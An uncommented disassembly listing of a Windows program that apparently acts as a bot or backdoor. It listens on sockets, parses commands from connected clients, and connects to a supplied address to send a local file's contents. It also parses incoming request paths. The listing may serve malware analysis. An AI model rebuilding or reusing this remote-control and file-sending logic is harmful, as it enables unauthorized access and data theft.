mov dword_4410C0, eax
call socket ; socket
mov esi, eax
lea eax, [ebp+optval]
push 4 ; optlen
push eax ; optval
push 4 ; optname
push 0FFFFh ; level
push esi ; s
mov [ebp+s], esi
call setsockopt ; setsockopt
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push esi ; s
call ioctlsocket ; ioctlsocket
mov ax, word ptr dword_4410C0
mov [ebp+name.sa_family], 2
push eax ; hostshort
mov dword ptr [ebp+name.sa_data+2], edi
call htons ; htons
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push esi ; s
call bind ; bind
test eax, eax
jge short loc_405DD8
mov eax, ebx
jmp loc_4062DD
; ---------------------------------------------------------------------------
loc_405DD8: ; CODE XREF: sub_405D1B+B4�j
push 0Ah ; backlog
push esi ; s
call listen ; listen
mov [ebp+var_238], ebx
mov ebx, send
mov [ebp+var_234], esi
mov [ebp+var_4], esi
loc_405DF6: ; CODE XREF: sub_405D1B+112�j
; sub_405D1B+5BA�j
push 41h
lea esi, [ebp+var_238]
pop ecx
lea edi, [ebp+readfds]
rep movsd
xor edi, edi
lea eax, [ebp+readfds]
push edi ; timeout
push edi ; exceptfds
push edi ; writefds
push eax ; readfds
mov eax, [ebp+var_4]
inc eax
push eax ; nfds
call select ; select
cmp eax, 0FFFFFFFFh
jz loc_4062DA
cmp [ebp+var_4], edi
mov [ebp+arg_0], edi
jl short loc_405DF6
loc_405E2F: ; CODE XREF: sub_405D1B+5B4�j
xor esi, esi
push 64h
lea eax, [ebp+buf]
push esi
push eax
call sub_4179E0
push 64h
lea eax, [ebp+var_AC]
push esi
push eax
call sub_4179E0
add esp, 18h
lea eax, [ebp+readfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet ; __WSAFDIsSet
test eax, eax
jz loc_4062C8
cmp edi, [ebp+s]
jnz short loc_405ED8
lea eax, [ebp+addrlen]
mov [ebp+addrlen], 10h
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push [ebp+s] ; s
call accept ; accept
cmp eax, 0FFFFFFFFh
jz loc_4062C8
mov edx, [ebp+var_238]
xor ecx, ecx
cmp edx, esi
jbe short loc_405EAA
loc_405E9C: ; CODE XREF: sub_405D1B+18D�j
cmp [ebp+ecx*4+var_234], eax
jz short loc_405EAA
inc ecx
cmp ecx, edx
jb short loc_405E9C
loc_405EAA: ; CODE XREF: sub_405D1B+17F�j
; sub_405D1B+188�j
cmp ecx, edx
jnz short loc_405EC0
cmp edx, 40h
jnb short loc_405EC0
mov [ebp+ecx*4+var_234], eax
inc [ebp+var_238]
loc_405EC0: ; CODE XREF: sub_405D1B+191�j
; sub_405D1B+196�j
cmp eax, [ebp+var_4]
jle short loc_405EC8
mov [ebp+var_4], eax
loc_405EC8: ; CODE XREF: sub_405D1B+1A8�j
push esi ; flags
push 15h ; len
push offset unk_42AC98 ; buf
push eax ; s
call ebx ; send
jmp loc_4062C8
; ---------------------------------------------------------------------------
loc_405ED8: ; CODE XREF: sub_405D1B+14F�j
push esi ; flags
lea eax, [ebp+buf]
push 64h ; len
push eax ; buf
push edi ; s
call recv ; recv
test eax, eax
jg short loc_405F35
mov ecx, [ebp+var_238]
xor eax, eax
cmp ecx, esi
jbe short loc_405F29
loc_405EF9: ; CODE XREF: sub_405D1B+1EA�j
cmp [ebp+eax*4+var_234], edi
jz short loc_405F1E
inc eax
cmp eax, ecx
jb short loc_405EF9
jmp short loc_405F29
; ---------------------------------------------------------------------------
loc_405F09: ; CODE XREF: sub_405D1B+206�j
mov ecx, [ebp+eax*4+var_230]
mov [ebp+eax*4+var_234], ecx
mov ecx, [ebp+var_238]
inc eax
loc_405F1E: ; CODE XREF: sub_405D1B+1E5�j
dec ecx
cmp eax, ecx
jb short loc_405F09
dec [ebp+var_238]
loc_405F29: ; CODE XREF: sub_405D1B+1DC�j
; sub_405D1B+1EC�j
push edi ; s
call closesocket ; closesocket
jmp loc_4062C8
; ---------------------------------------------------------------------------
loc_405F35: ; CODE XREF: sub_405D1B+1D0�j
lea eax, [ebp+var_334]
push eax
lea eax, [ebp+var_AC]
push eax
lea eax, [ebp+buf]
push 42AC90h
push eax
call sub_418ED7
lea eax, [ebp+var_AC]
push 42AC88h
push eax
call sub_417D80
add esp, 18h
test eax, eax
jnz short loc_405F79
push esi
push 16h
push 42AC70h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_405F79: ; CODE XREF: sub_405D1B+24F�j
lea eax, [ebp+var_AC]
push 42AC68h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_405F9D
push esi
push 14h
push 42AC50h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_405F9D: ; CODE XREF: sub_405D1B+273�j
lea eax, [ebp+var_AC]
push 42AC48h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_405FC1
push esi
push 0Dh
push 42AC38h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_405FC1: ; CODE XREF: sub_405D1B+297�j
lea eax, [ebp+var_AC]
push 42AC30h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_405FE5
push esi
push 10h
push 42AC1Ch
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_405FE5: ; CODE XREF: sub_405D1B+2BB�j
lea eax, [ebp+var_AC]
push 42AC18h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_406009
push esi
push 1Eh
push 42ABF8h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_406009: ; CODE XREF: sub_405D1B+2DF�j
lea eax, [ebp+var_AC]
push 42ABF0h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_406044
lea eax, [ebp+var_334]
push 42ABECh
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_406044
push esi
push 13h
push 42ABD8h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_406044: ; CODE XREF: sub_405D1B+303�j
; sub_405D1B+31A�j
lea eax, [ebp+var_AC]
push 42ABF0h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40607F
lea eax, [ebp+var_334]
push 42ABD4h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40607F
push esi
push 13h
push 42ABC0h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_40607F: ; CODE XREF: sub_405D1B+33E�j
; sub_405D1B+355�j
lea eax, [ebp+var_AC]
push 42ABB8h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4060CD
push 0Ah
mov esi, 42AB8Ch
pop ecx
lea edi, [ebp+var_124]
rep movsd
push eax ; flags
lea eax, [ebp+var_124]
push eax
movsw
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+var_124]
loc_4060BD: ; CODE XREF: sub_405D1B+3F1�j
push eax ; buf
push [ebp+arg_0] ; s
call ebx ; send
mov edi, [ebp+arg_0]
xor esi, esi
jmp loc_4062B6
; ---------------------------------------------------------------------------
loc_4060CD: ; CODE XREF: sub_405D1B+379�j
lea eax, [ebp+var_AC]
push 42AB84h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_40610E
push 5
mov esi, 42AB6Ch
pop ecx
lea edi, [ebp+var_C4]
rep movsd
movsw
push eax
lea eax, [ebp+var_C4]
push eax
movsb
call sub_4180D0
pop ecx
push eax
lea eax, [ebp+var_C4]
jmp short loc_4060BD
; ---------------------------------------------------------------------------
loc_40610E: ; CODE XREF: sub_405D1B+3C7�j
lea eax, [ebp+var_AC]
push 42AB64h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_4061DF
lea eax, [ebp+var_2D0]
push eax
lea eax, [ebp+var_F8]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+buf]
push 42AB3Ch
push eax
call sub_418ED7
lea eax, [ebp+var_F8]
push eax
call sub_417ECF
mov dword ptr [ebp+hostshort], eax
lea eax, [ebp+var_2D0]
push eax
call sub_417ECF
mov [ebp+arg_0], eax
push 32h
lea eax, [ebp+var_F8]
push esi
push eax
call sub_4179E0
push [ebp+arg_0]
lea eax, [ebp+var_F8]
push dword ptr [ebp+hostshort]
push 42AB34h
push eax
call sub_41795B
add esp, 44h
lea eax, [ebp+var_F8]
push 10h
push esi
push eax
call sub_418EC0
mov dword ptr [ebp+hostshort], eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+cp]
push 42AB28h
push eax
call sub_41795B
add esp, 24h
push esi
push 1Dh
push 42AB08h
jmp loc_4062B3
; ---------------------------------------------------------------------------
loc_4061DF: ; CODE XREF: sub_405D1B+408�j
lea eax, [ebp+var_AC]
push 42AB00h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz loc_406294
push esi ; flags
push 28h ; len
push offset unk_42AAD4 ; buf
push edi ; s
call ebx ; send
push dword ptr [ebp+hostshort] ; hostshort
lea eax, [ebp+cp]
push eax ; cp
call sub_4062E4
pop ecx
cmp eax, 1
pop ecx
jnz short loc_40628A
call sub_406361
cmp eax, 1
jnz loc_4062B6
push esi ; flags
push 17h ; len
push offset unk_42AABC ; buf
push edi ; s
call ebx ; send
lea eax, [ebp+var_6D8]
push eax
lea eax, [ebp+cp]
push eax
lea eax, [ebp+var_8DC]
push 42AA50h
push eax
call sub_41795B
add esp, 10h
cmp [ebp+var_440], esi
jnz short loc_40627B
push esi ; int
lea eax, [ebp+var_8DC]
push [ebp+var_444] ; int
push eax ; int
lea eax, [ebp+var_4C4]
push eax ; int
push [ebp+var_6DC] ; s
call sub_40E1D6
add esp, 14h
loc_40627B: ; CODE XREF: sub_405D1B+53B�j
lea eax, [ebp+var_8DC]
push eax
call sub_40CB08
pop ecx
jmp short loc_4062B6
; ---------------------------------------------------------------------------
loc_40628A: ; CODE XREF: sub_405D1B+4FB�j
push esi
push 20h
push 42AA2Ch
jmp short loc_4062B3
; ---------------------------------------------------------------------------
loc_406294: ; CODE XREF: sub_405D1B+4D9�j
lea eax, [ebp+var_AC]
push 42AA24h
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jnz short loc_4062B6
push esi ; flags
push 1Bh ; len
push offset unk_42AA08 ; buf
loc_4062B3: ; CODE XREF: sub_405D1B+259�j
; sub_405D1B+27D�j ...
push edi ; s
call ebx ; send
loc_4062B6: ; CODE XREF: sub_405D1B+3AD�j
; sub_405D1B+505�j ...
push 64h
lea eax, [ebp+buf]
push esi
push eax
call sub_4179E0
add esp, 0Ch
loc_4062C8: ; CODE XREF: sub_405D1B+146�j
; sub_405D1B+16F�j ...
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jle loc_405E2F
jmp loc_405DF6
; ---------------------------------------------------------------------------
loc_4062DA: ; CODE XREF: sub_405D1B+106�j
xor eax, eax
inc eax
loc_4062DD: ; CODE XREF: sub_405D1B+B8�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_405D1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4062E4(char *cp, u_short hostshort)
sub_4062E4 proc near ; CODE XREF: sub_405D1B+4F1�p
WSAData = WSAData ptr -1A0h
name = sockaddr ptr -10h
cp = dword ptr 8
hostshort = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1A0h
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 101h ; wVersionRequested
call WSAStartup ; WSAStartup
push 0 ; protocol
push 1 ; type
push 2 ; af
call socket ; socket
push [ebp+cp] ; cp
mov dword ptr unk_4410C4, eax
mov [ebp+name.sa_family], 2
call inet_addr ; inet_addr
push dword ptr [ebp+hostshort] ; hostshort
mov dword ptr [ebp+name.sa_data+2], eax
call htons ; htons
mov word ptr [ebp+name.sa_data], ax
lea eax, [ebp+name]
push 10h ; namelen
push eax ; name
push dword ptr unk_4410C4 ; s
call connect ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_40635C
push dword ptr unk_4410C4 ; s
call closesocket ; closesocket
call WSACleanup ; WSACleanup
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40635C: ; CODE XREF: sub_4062E4+60�j
xor eax, eax
inc eax
leave
retn
sub_4062E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406361 proc near ; CODE XREF: sub_405D1B+4FD�p
buf = byte ptr -1104h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
mov eax, 1104h
call sub_417F30
push esi
push edi
lea eax, [ebp+var_104]
push 104h
xor edi, edi
push eax
push edi
call dword ptr byte_424084+4
lea eax, [ebp+var_104]
push 42ACB0h
push eax
call sub_41924D
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
jz short loc_406408
push 2
push edi
push esi
call sub_4191A1
push esi
call sub_419049
push edi
push edi
push esi
call sub_4191A1
add esp, 1Ch
jmp short loc_406402
; ---------------------------------------------------------------------------
loc_4063BA: ; CODE XREF: sub_406361+A5�j
push 1000h
lea eax, [ebp+buf]
push edi
push eax
call sub_4179E0
push esi
push 800h
lea eax, [ebp+buf]
push 1
push eax
call sub_418F61
add esp, 1Ch
test byte ptr [esi+0Ch], 20h
jnz short loc_406408
cmp eax, edi
jle short loc_406402
push edi ; flags
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push dword ptr unk_4410C4 ; s
call send ; send
loc_406402: ; CODE XREF: sub_406361+57�j
; sub_406361+8A�j
test byte ptr [esi+0Ch], 10h
jz short loc_4063BA
loc_406408: ; CODE XREF: sub_406361+3B�j
; sub_406361+86�j
push esi
call sub_418F0B
pop ecx
push dword ptr unk_4410C4 ; s
call closesocket ; closesocket
call WSACleanup ; WSACleanup
xor eax, eax
pop edi
inc eax
pop esi
leave
retn
sub_406361 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_406428(LPVOID)
sub_406428 proc near ; DATA XREF: sub_407B48+382�o
; sub_40FCA3+5780�o
buf = byte ptr -28F0h
var_18F0 = byte ptr -18F0h
var_8F0 = dword ptr -8F0h
readfds = fd_set ptr -6F0h
var_5EC = dword ptr -5ECh
var_5E8 = dword ptr -5E8h
var_360 = dword ptr -360h
hostshort = word ptr -25Ch
var_254 = dword ptr -254h
var_250 = dword ptr -250h
var_24C = dword ptr -24Ch
var_248 = dword ptr -248h
var_23C = dword ptr -23Ch
addr = sockaddr ptr -138h
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
name = sockaddr ptr -24h
argp = dword ptr -14h
var_10 = dword ptr -10h
addrlen = dword ptr -0Ch
s = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 28F0h
call sub_417F30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_5EC]
xor ebx, ebx
rep movsd
xor esi, esi
push 10h
inc esi
push ebx
mov [eax+3ACh], esi
lea eax, [ebp+name]
push eax
mov [ebp+argp], esi
call sub_4179E0
add esp, 0Ch
mov [ebp+name.sa_family], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
push ebx ; protocol
push esi ; type
push 2 ; af
mov word ptr [ebp+name.sa_data], ax
mov dword ptr [ebp+name.sa_data+2], ebx
call socket_0
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+s], edi
jz loc_4067EE
mov eax, [ebp+var_254]
push 10h ; namelen
imul eax, 234h
mov [eax+44B874h], edi
lea eax, [ebp+name]
push eax ; name
push edi ; s
call bind_0
cmp eax, 0FFFFFFFFh
jz loc_4067EE
push 7FFFFFFFh ; backlog
push edi ; s
call listen_0
cmp eax, 0FFFFFFFFh
jz loc_4067EE
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ioctlsocket_0
cmp eax, 0FFFFFFFFh
jz loc_4067EE
mov ebx, esi
mov [ebp+var_124], edi
mov [ebp+var_128], ebx
mov [ebp+var_4], edi
loc_4064FF: ; CODE XREF: sub_406428+3BC�j
push 41h
xor eax, eax
pop ecx
lea esi, [ebp+var_128]
push eax ; timeout
push eax ; exceptfds
push eax ; writefds
lea eax, [ebp+readfds]
push eax ; readfds
mov eax, [ebp+var_4]
lea edi, [ebp+readfds]
inc eax
rep movsd
push eax ; nfds
call select_0
cmp eax, 0FFFFFFFFh
jz loc_4067E9
xor edi, edi
mov [ebp+arg_0], edi
loc_406535: ; CODE XREF: sub_406428+3B6�j
lea eax, [ebp+readfds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet_0
test eax, eax
jz loc_4067D4
cmp edi, [ebp+s]
jnz short loc_4065B6
lea eax, [ebp+addrlen]
mov [ebp+addrlen], 10h
push eax ; addrlen
lea eax, [ebp+addr]
push eax ; addr
push [ebp+s] ; s
call accept_0
cmp eax, 0FFFFFFFFh
jz loc_4067D4
xor ecx, ecx
test ebx, ebx
jbe short loc_406588
loc_40657A: ; CODE XREF: sub_406428+15E�j
cmp [ebp+ecx*4+var_124], eax
jz short loc_406588
inc ecx
cmp ecx, ebx
jb short loc_40657A
loc_406588: ; CODE XREF: sub_406428+150�j
; sub_406428+159�j
cmp ecx, ebx
jnz short loc_4065A5
cmp ebx, 40h
jnb short loc_4065A5
mov [ebp+ecx*4+var_124], eax
mov ebx, [ebp+var_128]
inc ebx
mov [ebp+var_128], ebx
loc_4065A5: ; CODE XREF: sub_406428+162�j
; sub_406428+167�j
cmp eax, [ebp+var_4]
jbe loc_4067D4
mov [ebp+var_4], eax
jmp loc_4067D4
; ---------------------------------------------------------------------------
loc_4065B6: ; CODE XREF: sub_406428+126�j
mov esi, 1000h
lea eax, [ebp+buf]
push esi
push 0
push eax
call sub_4179E0
push esi
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_4179E0
add esp, 18h
lea eax, [ebp+buf]
push 0 ; flags
push esi ; len
push eax ; buf
push edi ; s
call recv_0
test eax, eax
jg short loc_40663D
push edi ; s
call closesocket_0
xor eax, eax
test ebx, ebx
jbe loc_4067D4
loc_406602: ; CODE XREF: sub_406428+1E6�j
cmp [ebp+eax*4+var_124], edi
jz short loc_40662A
inc eax
cmp eax, ebx
jb short loc_406602
jmp loc_4067D4
; ---------------------------------------------------------------------------
loc_406615: ; CODE XREF: sub_406428+207�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ebx, [ebp+var_128]
inc eax
loc_40662A: ; CODE XREF: sub_406428+1E1�j
lea ecx, [ebx-1]
cmp eax, ecx
jb short loc_406615
dec ebx
mov [ebp+var_128], ebx
jmp loc_4067D4
; ---------------------------------------------------------------------------
loc_40663D: ; CODE XREF: sub_406428+1C7�j
xor esi, esi
push 104h
lea eax, [ebp+var_23C]
push esi
push eax
call sub_4179E0
lea eax, [ebp+buf]
xor edi, edi
push eax
call sub_4180D0
add esp, 10h
test eax, eax
jbe loc_4067D4
loc_40666A: ; CODE XREF: sub_406428+2F9�j
mov al, [ebp+edi+buf]
cmp al, 0Ah
mov [ebp+esi+var_18F0], al
jnz loc_406710
mov esi, 42AD04h
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417F60
pop ecx
test eax, eax
pop ecx
jz short loc_4066E0
lea eax, [ebp+var_18F0]
push eax
call sub_4180D0
cmp eax, 5
pop ecx
jbe short loc_4066E0
mov eax, 42AD00h
push eax
push eax
lea eax, [ebp+var_18F0]
push esi
push eax
call sub_417F60
pop ecx
pop ecx
push eax
call sub_417F60
pop ecx
pop ecx
push eax
call sub_419260
push eax
lea eax, [ebp+var_23C]
push eax
call sub_417FE0
add esp, 10h
jmp short loc_4066F7
; ---------------------------------------------------------------------------
loc_4066E0: ; CODE XREF: sub_406428+26E�j
; sub_406428+280�j
lea eax, [ebp+var_18F0]
push 42ACFCh
push eax
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_40672C
loc_4066F7: ; CODE XREF: sub_406428+2B6�j
push 1000h
lea eax, [ebp+var_18F0]
push 0
push eax
call sub_4179E0
add esp, 0Ch
or esi, 0FFFFFFFFh
loc_406710: ; CODE XREF: sub_406428+252�j
lea eax, [ebp+buf]
inc edi
push eax
inc esi
call sub_4180D0
cmp edi, eax
pop ecx
jb loc_40666A
jmp loc_4067D4
; ---------------------------------------------------------------------------
loc_40672C: ; CODE XREF: sub_406428+2CD�j
xor eax, eax
test ebx, ebx
jbe short loc_406768
loc_406732: ; CODE XREF: sub_406428+319�j
mov ecx, [ebp+eax*4+var_124]
cmp ecx, [ebp+arg_0]
jz short loc_40675A
inc eax
cmp eax, ebx
jb short loc_406732
jmp short loc_406768
; ---------------------------------------------------------------------------
loc_406745: ; CODE XREF: sub_406428+337�j
mov ecx, [ebp+eax*4+var_120]
mov [ebp+eax*4+var_124], ecx
mov ebx, [ebp+var_128]
inc eax
loc_40675A: ; CODE XREF: sub_406428+314�j
lea ecx, [ebx-1]
cmp eax, ecx
jb short loc_406745
dec ebx
mov [ebp+var_128], ebx
loc_406768: ; CODE XREF: sub_406428+308�j
; sub_406428+31B�j
lea eax, [ebp+var_360]
push eax
call sub_4180D0
mov esi, eax
lea eax, [ebp+var_23C]
push eax
call sub_4180D0
add esi, eax
pop ecx
cmp esi, 104h
pop ecx
jnb short loc_4067CB
and [ebp+var_10], 0
lea eax, [ebp+var_10]
push eax ; argp
push 8004667Eh ; cmd
push [ebp+arg_0] ; s
call ioctlsocket_0
push [ebp+var_254] ; int
lea eax, [ebp+var_23C]
push [ebp+var_248] ; int
push eax ; int
lea eax, [ebp+var_360]
push eax ; int
push [ebp+arg_0] ; s
call sub_4069DA
add esp, 14h
jmp short loc_4067D4
; ---------------------------------------------------------------------------
loc_4067CB: ; CODE XREF: sub_406428+364�j
push [ebp+arg_0] ; s
call closesocket_0
loc_4067D4: ; CODE XREF: sub_406428+11D�j
; sub_406428+146�j ...
mov edi, [ebp+arg_0]
inc edi
cmp edi, [ebp+var_4]
mov [ebp+arg_0], edi
jbe loc_406535
jmp loc_4064FF
; ---------------------------------------------------------------------------
loc_4067E9: ; CODE XREF: sub_406428+102�j
mov edi, [ebp+s]
xor ebx, ebx
loc_4067EE: ; CODE XREF: sub_406428+6A�j
; sub_406428+92�j ...
call WSAGetLastError ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push 42ACB8h
push eax
call sub_41795B
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_406834
push ebx ; int
lea eax, [ebp+var_8F0]
push [ebp+var_250] ; int
push eax ; int
lea eax, [ebp+var_5E8]
push eax ; int
push [ebp+var_5EC] ; s
call sub_40E1D6
add esp, 14h
loc_406834: ; CODE XREF: sub_406428+3E7�j
lea eax, [ebp+var_8F0]
push eax
call sub_40CB08
pop ecx
push edi ; s
call closesocket_0
push [ebp+var_254]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_406428 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; DATA XREF: sub_4069DA+245�o
buf = byte ptr -1654h
var_654 = dword ptr -654h
var_550 = dword ptr -550h
s = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
DateStr = byte ptr -68h
TimeStr = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_417F30
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+s]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_41795B
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_654]
push eax
call sub_41795B
xor edi, edi
add esp, 10h
cmp [ebp+var_A4], edi
lea eax, [ebp+var_9C]
jz short loc_4068C9
push 42AF18h
jmp short loc_4068CE
; ---------------------------------------------------------------------------
loc_4068C9: ; CODE XREF: StartAddress+62�j
push 42AEFCh
loc_4068CE: ; CODE XREF: StartAddress+69�j
push eax
call sub_41795B
pop ecx
lea eax, [ebp+DateStr]
pop ecx
mov esi, 409h
push 46h ; cchDate
push eax ; lpDateStr
push offset unk_42AEE8 ; lpFormat
push edi ; lpDate
push edi ; dwFlags
push esi ; Locale
call GetDateFormatA ; GetDateFormatA
lea eax, [ebp+TimeStr]
push 1Eh ; cchTime
push eax ; lpTimeStr
push offset unk_42AEDC ; lpFormat
push edi ; lpTime
push edi ; dwFlags
push esi ; Locale
call GetTimeFormatA ; GetTimeFormatA
lea eax, [ebp+TimeStr]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+DateStr]
push eax
lea eax, [ebp+TimeStr]
push eax
lea eax, [ebp+DateStr]
push eax
lea eax, [ebp+TimeStr]
push eax
lea eax, [ebp+DateStr]
push eax
lea eax, [ebp+var_9C]
jnz short loc_406941
push eax
lea eax, [ebp+buf]
push 42AE00h
push eax
call sub_41795B
add esp, 24h
jmp short loc_40695C
; ---------------------------------------------------------------------------
loc_406941: ; CODE XREF: StartAddress+CA�j
push [ebp+var_B8]
push eax
lea eax, [ebp+buf]
push 42AD10h
push eax
call sub_41795B
add esp, 28h
loc_40695C: ; CODE XREF: StartAddress+E1�j
lea eax, [ebp+buf]
push edi ; flags
push eax
call sub_4180D0
pop ecx
push eax ; len
lea eax, [ebp+buf]
push eax ; buf
push [ebp+s] ; s
call send_0
cmp [ebp+var_A4], edi
jnz short loc_40699C
lea eax, [ebp+var_550]
push eax ; int
push [ebp+s] ; s
call sub_40730A
pop ecx
pop ecx
jmp short loc_4069B9
; ---------------------------------------------------------------------------
loc_40699C: ; CODE XREF: StartAddress+126�j
lea eax, [ebp+var_654]
push eax ; int
push edi ; int
push [ebp+s] ; s
lea eax, [ebp+var_550]
push eax ; int
call sub_406C89
add esp, 10h
loc_4069B9: ; CODE XREF: StartAddress+13C�j
push [ebp+s] ; s
call closesocket_0
push [ebp+var_B4]
call sub_417735
pop ecx
push edi ; dwExitCode
call ExitThread ; ExitThread
StartAddress endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4069DA(SOCKET s, int, int, int, int)
sub_4069DA proc near ; CODE XREF: sub_406428+399�p
var_8C4 = byte ptr -8C4h
Parameter = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
ThreadId = dword ptr -8
var_4 = dword ptr -4
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_4179E0
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
push eax
jz short loc_406A10
push 42AFC0h
jmp short loc_406A18
; ---------------------------------------------------------------------------
loc_406A10: ; CODE XREF: sub_4069DA+2D�j
mov byte ptr [eax], 5Ch
push 42744Ch
loc_406A18: ; CODE XREF: sub_4069DA+34�j
lea eax, [ebp+var_10C]
push eax
call sub_41795B
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_4180D0
test eax, eax
pop ecx
jbe short loc_406AB3
mov [ebp+arg_8], 2
loc_406A43: ; CODE XREF: sub_4069DA+D7�j
lea eax, [ebp+var_10C]
push eax
call sub_4180D0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_406A83
cmp [ebp+esi+var_10C], 25h
jnz short loc_406A83
cmp [ebp+esi+var_10B], 32h
jnz short loc_406A83
cmp [ebp+esi+var_10A], 30h
jnz short loc_406A83
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_406A9D
; ---------------------------------------------------------------------------
loc_406A83: ; CODE XREF: sub_4069DA+79�j
; sub_4069DA+83�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_406A93
push 5Ch
pop eax
jmp short loc_406A96
; ---------------------------------------------------------------------------
loc_406A93: ; CODE XREF: sub_4069DA+B2�j
movsx eax, al
loc_406A96: ; CODE XREF: sub_4069DA+B7�j
mov [ebp+ebx+var_210], al
loc_406A9D: ; CODE XREF: sub_4069DA+A7�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_4180D0
cmp esi, eax
pop ecx
jb short loc_406A43
loc_406AB3: ; CODE XREF: sub_4069DA+60�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push 42AFB8h
push eax
call sub_41795B
lea eax, [ebp+var_314]
push 42AFB4h
push eax
call sub_419260
add esp, 18h
lea eax, [ebp+var_314]
push eax
call dword ptr byte_42409C+4
xor esi, esi
inc esi
cmp eax, 10h
jz short loc_406B01
